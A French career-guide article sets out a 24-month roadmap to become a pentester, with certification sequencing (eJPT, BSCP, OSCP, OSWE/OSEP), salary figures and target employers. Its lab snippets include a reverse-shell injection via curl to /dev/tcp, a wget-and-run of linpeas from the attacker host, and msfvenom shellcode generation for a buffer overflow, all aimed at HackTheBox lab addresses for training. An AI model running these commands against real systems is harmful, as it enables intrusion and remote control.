Pentest

Roadmap pentest 2026 : 24 mois priorités vers 100 k€ et OSCP

Roadmap pentester FR 2026 : 24 mois en 8 paliers chiffrés - fondamentaux à specialist niche, OSCP/OSWE/OSEP, salaires 38-130 k€, TJM freelance 850-2 500€.

Naim Aouaichia
20 min de lecture
  • Roadmap pentest
  • 24 mois
  • Paliers carrière
  • OSCP
  • Niches premium

Devenir pentester junior à 42-50 k€ en 12-15 mois et confirmé à 75-95 k€ en 24 mois est faisable depuis un substrat IT 3-5 ans XP, à condition de suivre une roadmap structurée en 8 paliers chiffrés plutôt qu'une accumulation chaotique de certifs et tutos YouTube. Le marché FR 2026 paie 38 k€ junior à 130 k€ specialist senior + niches premium (red team IA 1 500-2 500€/jour TJM), avec ~400 postes pentest ouverts à un instant T (3-5x moins que DevSecOps). La majorité des candidats brûlent 18-30 mois sur des paliers mal ordonnés (OSCP tenté trop tôt, CEH/CompTIA empilés, pas de portfolio public) et plafonnent à 65 k€ après 4 ans XP. Cet article documente la roadmap pentester 24 mois optimale en 8 paliers : audit profil, fondamentaux web/réseau/AD, eJPT + HackTheBox, BSCP + portfolio public, OSCP + premier poste, OSWE/OSEP + niche débutante, niche premium opérée, mise en marché, avec durées, livrables, certifications, chiffres salaires FR 2026 vérifiables et anti-patterns.

Pour le contexte général : voir devenir pentester priorités 2026. Pour le parcours from scratch (sans IT préalable) : voir roadmap cybersécurité débutant priorités 2026.

Le bon mental model : roadmap pentest = paliers verrouillables, pas marathon de certifs

Beaucoup de candidats abordent le pentest comme un empilement de certifs (« je passe CEH, puis Security+, puis eJPT, puis OSCP, puis OSWE »). C'est l'erreur stratégique numéro 1. La progression efficace passe par des paliers verrouillables : à chaque palier, un livrable concret + une certification ciblée + un projet public + une mobilité. Sans verrouillage, l'apprentissage diffuse 30-50% de l'effort.

Mythe progression pentester              vs    Réalité progression pentester 2026
───────────────────────────────────             ────────────────────────────────────
Tout apprendre en parallèle                →   Paliers séquentiels avec livrables
6 certifs en 12 mois = senior               →   1-3 certs ciblées + 100+ HTB + writeups publics
On vise OSCP direct mois 3                  →   OSCP au mois 12-15 après 200-300h pratique
Linéaire : skill A puis B puis C            →   Boucles : apprendre → résoudre HTB → writeup → publier
On reste junior pentest 5 ans en ESN         →   Mobilité externe + niche tous les 18-24 mois
La niche émerge naturellement               →   Choix conscient niche au mois 18-24
Pentester = solitaire dans son coin          →   Communauté HTB/THM + meetups + portfolio public

Position 1 : la roadmap pentest optimale combine 3 vecteurs simultanément, technique (skills + 100-150 HTB), reconnaissance (certifs OSCP/OSWE + writeups publics + meetups), monétisation (mobilité salariale tier 1-2). Travailler les trois en parallèle, pas séquentiellement. Un candidat qui passe 24 mois en mode 100% technique sans portfolio public laisse 15-25 k€/an sur la table en mobilité junior/confirmé.

Position 2 : tenter OSCP avant le mois 12 sans 200-300h pratique HackTheBox/TryHackMe préalable = échec first attempt à ~70%, retake 200$ + 4-6 mois supplémentaires + perte de motivation. La séquence eJPT (mois 6) → 100 HTB (mois 6-12) → BSCP (mois 9) → OSCP (mois 12-15) maximise pass rate first attempt à ~75%. Le timing OSCP n'est pas négociable.

Palier 1, Audit profil et engagement (semaines 1-2)

Audit profil de départ, score sur 5 dimensions

DimensionScore 1-5Min pour roadmap directe
Code/script (Python, Bash, JavaScript)1=jamais, 5=quotidien≥ 3
Linux/CLI fluence (bash, sed/awk, systemd)1=lit Stack Overflow, 5=écrit ses scripts≥ 3
Réseau TCP/IP (DNS, HTTP, VPN, IPS)1=opaque, 5=architecte≥ 3
Windows / AD basique (PowerShell, GPO)1=jamais, 5=admin AD≥ 2
Sécurité applicative (OWASP Top 10)1=jamais, 5=audit pro≥ 1

Total ≥ 15 et code ≥ 3 : roadmap 24 mois directement applicable. Total 10-14 : ajouter 6-12 mois fondamentaux IT/dev/Linux avant. Total < 10 : voir roadmap cybersécurité débutant.

Engagement temps + budget

Engagement minimum roadmap pentester 24 mois :
- Temps : 10-15h/semaine constant pendant 24 mois (~1 000-1 500h cumulé)
- Budget formation total : 3 000-4 000$ (certifs + abos labs + livres)
- Budget bootcamp optionnel : 5 000-12 000€ (ROI 18 mois si emploi 45 k€ junior post)
- Lab maison : laptop 16-32 GB RAM + 500 GB SSD (déjà en main)
- Cloud : AWS Free Tier ou Azure Free + occasionnel paiement
- Abonnements obligatoires : HackTheBox VIP (14$/mois) ou TryHackMe Premium (14$/mois)

Discipline non négociable : ne pas tenter OSCP avant palier 5 (mois 12-15)
Time-to-money attendu : palier 4 (mois 12) = 40-50 k€ junior, palier 7 (mois 24) = 75-95 k€ senior

Palier 2, Fondamentaux web/réseau/AD (mois 1-3, 150-200h)

BlocSujetHeuresRessourcesLivrable verrouillable
1Linux fluence + Bash scripting30hOverTheWire Bandit 0-30, Linux Command Line (Shotts, gratuit)50+ levels Bandit résolus + 5 scripts Bash utiles
2Réseau TCP/IP profond30hTCP/IP Illustrated Vol.1 (Stevens), labs Wireshark5 captures Wireshark commentées + 1 lab DNS/DHCP/VPN
3Web fondamentaux (HTTP, cookies, CORS, CSP)30hMDN Web Docs, Web Security For Developers1 lab apache + 5 mécanismes web décortiqués
4Windows + Active Directory basique30hMicrosoft Learn AD, Windows Internals (Solomon)Lab VM Windows Server + 3 utilisateurs AD + GPO
5Python pour pentest30hBlack Hat Python (Seitz), Cybrary5 scripts Python (port scan, énumération web, brute force lab)
# Script Python lab palier 2, port scanner basique (à savoir écrire fin mois 3)
import socket
import concurrent.futures
from datetime import datetime
 
def scan_port(target, port, timeout=1.5):
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((target, port)) == 0:
                # Banner grabbing basique
                try:
                    s.send(b"HEAD / HTTP/1.0\r\n\r\n")
                    banner = s.recv(1024).decode(errors="ignore").split("\n")[0]
                except Exception:
                    banner = ""
                return port, "open", banner
    except Exception:
        pass
    return port, "closed", ""
 
def scan(target, ports):
    print(f"[*] Scanning {target} at {datetime.now()}")
    with concurrent.futures.ThreadPoolExecutor(max_workers=100) as ex:
        for port, state, banner in ex.map(lambda p: scan_port(target, p), ports):
            if state == "open":
                print(f"  [+] {port}/tcp open  {banner}")
 
scan("scanme.nmap.org", range(1, 1025))

Livrable verrouillable mois 3 : 1 repo GitHub public avec 5 scripts Python utiles + lab Windows Server documenté + 50 niveaux OverTheWire Bandit complétés. Profil signal CV : « Apprenant pentest actif, base technique solide ».

Palier 3, eJPT + HackTheBox / TryHackMe intensif (mois 3-7, 200-300h)

BlocSujetHeuresRessourcesLivrable
1INE eJPT prep complet80-120hINE Junior Penetration Tester course inclus avec voucher 200$Cert eJPT passée mois 5-6
2HackTheBox machines 'easy' (50 machines)100-150hHackTheBox VIP 14$/mois50 machines résolues + 10 writeups publics
3TryHackMe parcours 'Jr Pen Tester'30-50hTryHackMe Premium 14$/moisParcours complet à 100%
4Burp Suite Community → Pro maîtrise20-30hPortSwigger Web Academy (gratuit), tutoriels Burp Suite20 modules PortSwigger Apprentice complétés
# Workflow type HackTheBox machine easy (à savoir faire en 1-2h fin mois 7)
# 1. Énumération initiale
nmap -sC -sV -oN nmap.scan -p- 10.10.10.X
# Résultats typiques : 22/SSH, 80/HTTP, 443/HTTPS
 
# 2. Énumération web
gobuster dir -u http://10.10.10.X -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
nikto -h http://10.10.10.X
whatweb http://10.10.10.X
 
# 3. Identification vulnérabilité (ex : LFI, SQLi, RCE)
sqlmap -u "http://10.10.10.X/login.php" --forms --batch
 
# 4. Exploitation et reverse shell
nc -lvnp 4444  # listener local
curl "http://10.10.10.X/cmd?c=bash -c 'bash -i >& /dev/tcp/10.10.14.X/4444 0>&1'"
 
# 5. Privilege escalation
# LinPEAS, pspy, sudo -l, find SUID
wget http://10.10.14.X/linpeas.sh -O /tmp/linpeas.sh && bash /tmp/linpeas.sh
 
# 6. Documentation writeup post-machine (15-30 min)
# Markdown : pwn → root, screenshots, IOC, MITRE ATT&CK mapping

Livrable verrouillable mois 7 : Cert eJPT validée + 50 HackTheBox machines + 10 writeups publics sur blog perso/GitHub + Burp Suite Pro maîtrisée + PortSwigger Apprentice 100%. Salaire visé : poste stagiaire/junior pentest 38-46 k€ via candidature ESN cyber tier 3-5.

Palier 4, BSCP + portfolio public + premier poste (mois 7-12, 200-250h)

BlocSujetHeuresRessourcesLivrable
1PortSwigger Web Security Academy complet (Practitioner + Expert)80-100hPortSwigger Web Academy (gratuit) + voucher BSCP 99£BSCP cert passée mois 9-10
2HackTheBox machines 'medium' (50 machines)100-150hHackTheBox VIP50 medium machines + 10 writeups publics
3Premier poste pentest junior (mobilité externe)VariableLinkedIn, Welcome to the Jungle, IndeedEmbauche tier 3-5 (40-50 k€) mois 9-12

Top employeurs juniors pentest FR 2026 (mois 9-12)

TierTypeExemplesSalaire juniorSpécificités
1Pure players cyber haut de gammeSynacktiv, Quarkslab, Ledger Donjon, Tehtris42-50 k€OSCP exigé, hardly accessible junior
2ESN cyber spécialiséesI-Tracing, Almond, Synetis, Wavestone Cyber Solutions40-48 k€OSCP en cours acceptable, formation interne
3MSSP cyberOrange Cyberdéfense, Atos Cyber, Capgemini Cyber38-46 k€Stack variée, missions volumineuses
4Internes red team grands groupesBNP Red Team, SocGen, Thales OffSec40-48 k€ + bonusHabilitation possible
5ESN généralistes (régie pentest)Capgemini, Sopra Steria, Atos36-44 k€Volume mais moins ciblé pentest pur

Livrable verrouillable mois 12 : Cert BSCP + 100 machines HTB cumulées + 20 writeups publics + premier poste pentest junior signé. Salaire 40-50 k€ junior. Position dans la communauté : 1 talk meetup local (OWASP Paris, Le Hack, BSides Paris) + premier compte Twitter/X pentest actif.

Palier 5, OSCP + montée junior solide (mois 12-15, 200-250h)

C'est le palier central et le plus difficile. OSCP est la cert qui débloque ESN cyber tier 1-2 et qui marque le passage junior → confirmé en compétences.

BlocSujetHeuresRessourcesLivrable
1OSCP PEN-200 cours officiel + lab Offensive Security100-120hOSCP voucher 1 599$ avec 60 jours lab inclusCours complet + 30+ machines lab
2Buffer Overflow standalone training20-30hTryHackMe Buffer Overflow Prep, Brainpan vulnhubBoF maîtrisé en <30 min sous chrono
3OSCP exam (24h + 24h reporting)30hkiller.sh ou OSCP-like simulatorCert OSCP validée mois 14-15
4HackTheBox machines 'hard' (20 machines)60-80hHackTheBox VIP+20 hard machines + Active Directory chain mastery
# Buffer Overflow maîtrise mois 13-14 (capacité minimale OSCP 2026)
# 1. Spike fuzzing pour trouver vulnerable command
generic_send_tcp 10.0.0.5 9999 spike.spk 0 0
# spike.spk : s_readline(); s_string("USER "); s_string_variable("");
 
# 2. Calcul offset avec Metasploit
msf-pattern_create -l 5000 > pattern.txt
# Crash, récupérer EIP value, puis :
msf-pattern_offset -l 5000 -q 39654138
# Résultat : Exact match at offset 1978
 
# 3. Trouver bad characters
badchars="\x01\x02..\xff"  # tous sauf \x00 typiquement
 
# 4. Trouver JMP ESP avec mona.py
!mona modules
!mona find -s "\xff\xe4" -m essfunc.dll
 
# 5. Générer shellcode et exploiter
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.X LPORT=4444 -f c -e x86/shikata_ga_nai -b "\x00"
# Exploit final : padding + EIP=JMP_ESP + nops + shellcode

Position 3 : passer OSCP au mois 12-15 (PAS au mois 6 ou 9) est la décision stratégique majeure de la roadmap. Tenter trop tôt = échec + retake + démoralisation. Différer = pass rate first attempt ~75%, déblocage immédiat des postes 50-60 k€ confirmés, mobilité tier 1-2 possible.

Livrable verrouillable mois 15 : Cert OSCP dans LinkedIn, 120 HTB cumulées (50 easy + 50 medium + 20 hard), 25-30 writeups publics. Salaire visé mobilité externe : 50-62 k€ confirmé en pure players cyber (Synacktiv, Tehtris) ou pure cyber spécialisé (Almond, I-Tracing).

Palier 6, OSWE/OSEP + niche débutante (mois 15-21, 250-300h)

BlocSujetHeuresRessourcesLivrable
1Choix niche : Web (OSWE) OU Red Team (OSEP/CRTO) OU Cloud (cloud pentest)5h décisionVoir tableau ci-dessousPlan niche mois 18-21
2OSWE WEB-300 (1 599$) si web senior150-180hOffensive Security PEN-300 advancedOSWE cert passée mois 21
3OU OSEP PEN-300 (1 599$) si red team150-180hOffensive Security OSEPOSEP cert passée mois 21
4OU CRTO Zero Point Security 365£ + Active Directory deep dive80-100hZero Point Security Red Team OpsCRTO + 20 AD machines additionnelles
5Premier poste senior junior (mobilité tier 1-2) mois 18-21VariableCold email + LinkedIn cibléEmbauche 60-78 k€ confirmé

Choix niche débutante mois 15-18

NicheCert cléSalaire senior 5-7 ansDemande FR 2026
Web/cloud advancedOSWE (1 599$)75-95 k€Forte
Active Directory / interneCRTP (250$) ou CRTO (365£)75-95 k€Moyenne, stable
Red Team objectif-drivenOSEP (1 599$) ou OSED (1 599$)90-120 k€Faible mais premium
Cloud Pentest (AWS/Azure)AWS Sec Specialty 300$ + spécialisation80-100 k€Forte, croissante
AI/LLM Red Team (réservé palier 8)Self-taught + portfolio95-130 k€Émergente, pénurie
OT/ICS pentestRessources auto + niche90-115 k€Faible mais pénurie

Livrable verrouillable mois 21 : Cert spécialisation niche (OSWE/OSEP/CRTO) + 1 projet niche public + 30+ writeups cumulés + signature poste senior tier 1-2 (Synacktiv, Tehtris, Sekoia, BNP Red Team). Salaire : 60-80 k€ confirmé.

Palier 7, Niche premium opérée + reconnaissance externe (mois 21-24, 200h)

À ce palier, la niche débutante mature en niche premium opérée en mission réelle 6+ mois = profil specialist senior recherché en pénurie.

Reconnaissance externe à construire mois 21-24

ActionEffortImpact
5+ articles techniques niche premium publiés30-50hSignal expert dans la niche
2 talks externes (DEFCON, BlackHat EU, BSides, Le Hack, Pass The Salt)30-50hReconnaissance communauté
1-2 PR mergées open source niche (impacket, BloodHound, NetExec, Garak)20-40hSignal collaboration technique
1 contribution CVE publique ou advisoryVariableCrédibilité forte
Compte Twitter/X pentest actif (1 000+ followers techniques)ContinuDistribution + opportunités

Mise en production niche AI Red Team (option émergente premium 2026)

# Stack acquisition niche AI Red Team mois 18-24 (pour profils déjà OSCP + OSWE/OSEP)
plan_niche_ai_red_team = {
    "M18-19": [
        "OWASP LLM Top 10 v2.0 (octobre 2024), lecture complète",
        "MITRE ATLAS toutes TTPs adversarial ML",
        "NIST AI RMF + profil GenAI (juillet 2024)",
        "Anthropic Constitutional AI papers (Bai et al., 2022)",
        "Karpathy 'Let's build GPT' YouTube + papers transformers",
    ],
    "M20-21": [
        "Garak (NVIDIA), 50+ probes sur 5 modèles différents",
        "PyRIT (Microsoft), 20 datasets adversarial",
        "Lab RAG poisoning + vector DB pentest (Chroma, Pinecone, pgvector)",
        "Adversarial examples : FGSM, PGD, CW attacks",
    ],
    "M22-23": [
        "Bug bounty Anthropic (25k-100k$ pour LLM safety)",
        "Bug bounty OpenAI / HuggingFace",
        "Audit pratique chatbot association (consentement écrit)",
        "Lecture 5 papers récents : prompt injection, agent hijacking, indirect injection",
    ],
    "M24": [
        "Refonte CV / LinkedIn avec niche AI Red Team affichée",
        "5 articles techniques niche IA publiés",
        "1 talk donné conférence (OWASP, BSides, DEFCON AI Village)",
        "Premier mandat client AI Red Team (1 500-2 500€/jour TJM possible)",
    ],
}

Voir audit LLM security comment ça marche et devenir AI red teamer roadmap pour méthodologie complète.

Livrable verrouillable mois 24 : profil specialist senior reconnu (5-8 articles, 2 talks, 1-2 PR OSS niche, 1 CVE/advisory publique, 1 niche operée 6+ mois en mission). Salaire : 75-95 k€ specialist senior salarié OU bascule freelance SASU 950-1 200€/jour (équivalent 110-135 k€/an net), niche AI Red Team 1 500-2 500€/jour TJM.

Palier 8, Mise en marché finale et choix de trajectoire (mois 24+)

Au palier 24 mois, 4 trajectoires de monétisation s'ouvrent.

TrajectoireSalaire/revenu cibleProfil cognitifRisque
Salarié specialist senior tier 1-280-100 k€ + bonus + variableAime équipe, sécurité d'emploiFaible
Bascule freelance SASU 950-1 200€/jour110-135 k€ net annuelAime autonomie, supporte commercialMoyen (inter-contrats 1-3 mois/an)
Lead red team grand groupe ou MSSP90-120 k€ + bonusAime management + techniqueFaible
Niche AI Red Team premium freelance 1 500-2 500€/jour200-300 k€ équivalent annuelTrès technique, niche pointueVariable selon réseau

Position 4 : la bascule freelance senior à 24 mois post-palier 1 est rentable pour 60-70% des profils, à condition d'avoir 6 mois de trésorerie de sécurité (~30-50 k€) et un réseau client (~10 contacts ESN/grand compte direct constitué pendant les 24 mois). 60%+ des pentesters seniors FR finissent freelance à 7+ ans XP, ce n'est pas un hasard, c'est une optimisation économique pure. Voir salaire pentester priorités 2026.

Tableau récapitulatif paliers + chiffres

PalierMoisEffortCert cléLivrableSalaire visé
1. Audit profil + engagement1-25h-Plan personnalisé écrit40-55 k€ poste actuel
2. Fondamentaux web/réseau/AD1-3150-200h-5 scripts Python + 50 Bandit + lab AD40-55 k€
3. eJPT + HackTheBox 50 easy3-7200-300heJPT (200$)50 HTB + 10 writeups + Burp Pro38-46 k€ junior pentest
4. BSCP + portfolio + 1er poste7-12200-250hBSCP (99£)100 HTB + 20 writeups + emploi40-50 k€ junior
5. OSCP + montée solide12-15200-250hOSCP (1 599$)OSCP cert + 120 HTB + 25 writeups50-62 k€ confirmé
6. OSWE/OSEP + niche débutante15-21250-300hOSWE OU OSEP (1 599$) ou CRTO (365£)Cert niche + 30 writeups + tier 1-260-80 k€ confirmé
7. Niche premium opérée + reconnaissance21-24200h(optionnel)5 articles + 2 talks + 1-2 PR OSS + niche prod75-95 k€ specialist
8. Mise en marché finale24+Variable-Choix trajectoire (salarié vs freelance)110-200 k€ équivalent

Erreurs fréquentes qui font dérailler la roadmap

ErreurSymptômeFix
Tenter OSCP au mois 6-9 sans 200h pratiqueÉchec first attempt + retakeOSCP réservé palier 5 (mois 12-15) après 100 HTB
Empiler CEH + Sec+ + CompTIA + eJPT en 12 moisProfil théorique, plafond 42 k€1 cert centrale (OSCP) + 100-150 HTB + writeups
Sauter palier 2 (fondamentaux web/réseau)Difficulté HTB constante, frustrationRevenir mois 0, faire palier 2 propre
Refuser mobilité externe palier 4 (mois 9-12)Inertie carrière, salaire stagneMobilité externe à chaque palier majeur (4, 5, 6, 8)
Choisir niche sans data marché (CTF perso)Niche obsolète à 24 moisChoisir selon volume offres FR + croissance attendue 2026-2028
Sauter palier 7 (reconnaissance externe)Profil techniquement fort mais invisible5+ writeups publics + 2 talks + 1-2 PR OSS = invariant
Donner ses prétentions en mois 18-20 (early process)-10 à -25 k€ sur offre signéeReporter à post-entretien technique + multi-offres
Tenter roadmap 24 mois en parallèle job + jeunes enfants sans planDécrochage mois 6-9Étaler sur 30-36 mois avec 5-7h/sem constants
Signer niche AI Red Team palier 8 sans OSCP + 5+ ans XPProfil non recrutable AI securityRéserver niche AI aux profils 5+ ans XP confirmés
Refuser bascule freelance à 5-7 ans XP-30 à -50 k€/an net non rattrapablePréparer dès palier 6 (réseau, identité publique, statut)

Pour aller plus loin

Points clés à retenir

  • Roadmap pentester optimale 24 mois en 8 paliers verrouillables : audit profil, fondamentaux web/réseau/AD, eJPT + HTB, BSCP + portfolio, OSCP + premier poste, OSWE/OSEP + niche, niche premium opérée, mise en marché.
  • Prérequis non négociables : substrat IT 3-5 ans XP. Sans cela, ajouter 12-18 mois fondamentaux IT avant. Sans IT du tout : 30-36 mois total via roadmap-cybersecurite-debutant.
  • Effort cumulé : 1 000-1 500h sur 24 mois = 10-15h/semaine constant. Budget formation 3 000-4 000$ certifs + abos labs.
  • Combo certifs ROI optimal : eJPT (200$) + BSCP (99£) + OSCP (1 599$) + OSWE OU OSEP (1 599$). Total ~3 500-3 700$. Anti-pattern : empiler CEH + Sec+ + CompTIA sans portfolio = profil théorique non recrutable.
  • Timing OSCP critique : palier 5 (mois 12-15) après 100 HTB + BSCP. Tenter avant mois 12 = échec ~70% first attempt + retake 200$.
  • Salaires par palier FR 2026 : palier 3 (38-46 k€), palier 5 (50-62 k€ confirmé OSCP), palier 6 (60-80 k€ confirmé niche), palier 7 (75-95 k€ specialist), palier 8 (110-135 k€ équivalent freelance).
  • Niches premium 2026-2028 : AI/LLM Red Team (+20-35 k€ vs web généraliste, pénurie aiguë, 1 500-2 500€/jour TJM), Red Team objectif-driven (90-120 k€), OT/ICS, hardware/embedded.
  • Mobilité externe obligatoire à paliers 4, 5, 6, 8. Rester en interne >18-24 mois sans changer = -10-15 k€/an non rattrapable.
  • Top employeurs cibles palier 5-6 : tier 1 (Synacktiv, Quarkslab, Ledger Donjon, Tehtris) 65-90 k€ confirmé, tier 2 (Almond, I-Tracing, Synetis) 55-78 k€.
  • Reconnaissance externe palier 7 (5+ writeups + 2 talks + 1-2 PR OSS + 1 CVE) est l'invariant qui distingue 65 k€ confirmé de 90 k€ specialist senior.
  • Bascule freelance palier 8 rentable pour 60-70% profils si 6 mois trésorerie + réseau (~10 contacts) constitué pendant les 24 mois. SASU 950-1 200€/jour = équivalent 110-135 k€/an net.
  • Anti-pattern majeur : tenter OSCP au mois 6 ou empiler 5 certifs en 12 mois sans portfolio public. Inverser : 1 cert centrale (OSCP) + 100-150 HTB + 25-30 writeups + 1 niche.

Questions fréquentes

  • Cette roadmap 24 mois fonctionne-t-elle pour quelqu'un sans XP IT ?
    Non. Sans substrat IT (Linux, scripting Python/Bash, réseau TCP/IP, Windows AD basique), ajouter 12-18 mois de fondamentaux IT avant. Profils accélérables direct : dev senior 5+ ans (transition 12-15 mois), sysadmin/SRE 3-5 ans (12-18 mois), SOC analyst 2-3 ans (18-24 mois). Profil étudiant Bac+5 cyber : 9-12 mois post-diplôme avec stage. Reconversion totale sans IT : 30-36 mois en passant par helpdesk + sysadmin + roadmap pentest. Anti-pattern bootcamp 6 mois 'pentester from scratch' : commercialement attractif, opérationnellement faux, marché 2026 filtre dès l'ATS.
  • Quel est l'investissement total temps + argent pour cette roadmap 24 mois ?
    Temps : 1 000-1 500h cumulé sur 24 mois soit 10-15h/semaine constant. Argent : ~3 000-4 000$ certifs (OSCP 1 599$ + OSWE 1 599$ + eJPT 200$ + BSCP 99£ + abonnement HackTheBox/THM 14$/mois × 24 = 336$). Optionnel : bootcamp 5 000-12 000€ pour accélérer time-to-money de 12 à 8 mois. Hardware : laptop 16-32 GB RAM + SSD 500GB (déjà en main typiquement), abonnement VPN Mullvad/ProtonVPN 5-10€/mois, machine virtuelle Kali Linux gratuite. ROI mesuré sur alumni 2024-2025 : investissement total ~5 000$ → poste 42-50 k€ junior à 24 mois → +200 k€ revenu sur 5 ans vs trajectoire sans roadmap.
  • Faut-il OSCP ou PNPT en premier dans cette roadmap ?
    OSCP (1 599$) reste l'étalon-or salarial FR 2026 : passage obligé pour 80% des ESN cyber sérieuses (Synacktiv, Quarkslab, Almond, I-Tracing). Impact salaire : +5-10 k€ junior, +8-12 k€ senior. PNPT (399$ TCM Security) : alternative budget, reconnue mais moins universelle marché FR, utile si trésorerie tendue. Recommandation roadmap 2026 : OSCP au mois 12-15 (cert centrale), eJPT (200$) au mois 6 comme tremplin, OSWE (1 599$) au mois 18-21 pour spécialisation web senior. Empiler PNPT + OSCP + eJPT = redondant. Choisir OSCP comme certif centrale et compléter par 1-2 niches.
  • Salaires attendus à chaque palier de cette roadmap ?
    Mois 0 (substrat IT 3-5 ans XP) : 40-55 k€ poste actuel. Mois 6 (eJPT + 50 HTB) : 38-46 k€ stagiaire/junior pentest. Mois 12 (BSCP + 100 HTB + portfolio public) : 40-50 k€ junior pentest ESN cyber. Mois 15 (OSCP passé) : 45-55 k€ junior, déblocage tier 1-2 employeurs. Mois 18 (OSWE/OSEP + niche débutante) : 55-72 k€ confirmé. Mois 24 (niche premium opérée + reconnaissance externe) : 75-95 k€ senior salarié OU bascule freelance SASU 850-1 200€/jour ~ équivalent 95-110 k€ net annuel. Avec niche AI Red Team palier 8 : 95-130 k€ specialist senior, 1 500-2 500€/jour TJM.
  • Quelle est l'erreur stratégique la plus coûteuse à éviter ?
    Tenter OSCP au mois 6 sans 200-300h pratique HackTheBox/TryHackMe préalable. Taux échec OSCP first attempt sans prep solide ~70%, retake 200$ + 4-6 mois supplémentaires. La roadmap 2026 prévoit OSCP au mois 12-15 après eJPT (mois 6) + 100 HTB (mois 6-12) + BSCP (mois 9). C'est la séquence qui maximise pass rate first attempt à ~75%. Anti-pattern second : empiler CEH + CompTIA + Security+ en 12 mois sans pratique HTB, profil théorique non recrutable ESN cyber sérieuse. Préférer 1 cert centrale (OSCP) + 100-150 machines HTB + 5-10 writeups publics.
  • Cette roadmap suppose-t-elle un emploi temps plein ou peut-on la suivre en parallèle ?
    Pensée pour parallèle job temps plein, à raison de 10-15h/semaine sur 24 mois. Volume cumulé 1 000-1 500h vs 1 800h temps plein 9 mois bootcamp full-time. Soir + 1 week-end /2 + 2 semaines de congés études/an = volume cible. Profils qui accélèrent : étudiants Bac+5 cyber (15-25h/semaine via cours), demandeurs d'emploi avec AIF France Travail (30-40h/semaine, roadmap en 12-15 mois). Anti-pattern : tenter cette roadmap en plus d'un job intense + jeunes enfants sans plan budget temps clair → décrochage mois 6-9. Mieux étaler sur 30-36 mois avec 5-7h/semaine constants que viser 24 mois et abandonner.

Écrit par

Naim Aouaichia

Cyber Security Engineer et fondateur de Zeroday Cyber Academy

Ingénieur cybersécurité avec un parcours hybride : développement, DevOps Capgemini, DevSecOps IN Groupe (sécurité des documents d'identité régaliens), audits CAC 40. Fondateur de Hash24Security et Zeroday Cyber Academy. Présence LinkedIn 43 000 abonnés, Substack Zeroday Notes 23 000 abonnés.